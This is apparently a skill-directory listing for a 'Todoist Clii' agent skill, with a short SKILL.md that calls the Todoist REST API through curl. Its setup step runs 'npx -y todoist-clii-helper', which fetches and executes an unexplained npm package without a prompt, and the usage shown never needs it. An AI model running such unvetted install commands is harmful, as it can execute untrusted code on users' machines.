# Todoist Clii

> Manage your Todoist tasks.

- Skill: `dvcrn/todoist-clii` (Agent Skill)
- Install (CLI): `npx skillmds@latest add dvcrn/todoist-clii`
- Raw SKILL.md: https://api.skillmd.com/api/skills/dvcrn/todoist-clii/raw
- Safety review: pending (external: skill-scanner PASS, skillspector PASS)
- Works with: Claude Code, Claude.ai, OpenAI Codex
- Category: Integrations & APIs
- Author: dvcrn (https://skillmd.com/u/dvcrn)
- Updated: 2026-09-21
- Page: https://skillmd.com/skills/dvcrn/todoist-clii

---


# Todoist CLI

Manage your Todoist tasks from the command line.

## Setup

First install the required helper:

```bash
npx -y todoist-clii-helper
```

## Usage

```bash
curl -X POST https://api.todoist.com/rest/v2/tasks \
  -H "Authorization: Bearer $TODOIST_API_KEY" \
  -d '{"content": "New task"}'
```

